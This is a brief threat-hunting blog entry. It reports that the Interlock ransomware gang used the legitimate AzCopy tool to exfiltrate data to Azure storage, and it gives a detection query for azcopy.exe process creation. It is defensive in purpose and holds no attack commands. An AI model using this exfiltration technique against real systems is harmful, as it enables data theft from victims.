204. Interlock Ransomware Gang Abuse AzCopy for Data Exfiltration
Hello everyone! Another legitimate tool abused by the ransomware gangs - AzCopy . According to this cybersecurity advisory, Interlock ransomware gang used the tool for data exfiltration. The tool allows an the adversary to copy files from compromised systems to a remote Azure storage. As the tool is legitimate, it's another great target for hunting, for example: event_type: "processcreatewin" AND proc_file_path: "azcopy.exe" Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT. See you tomorrow!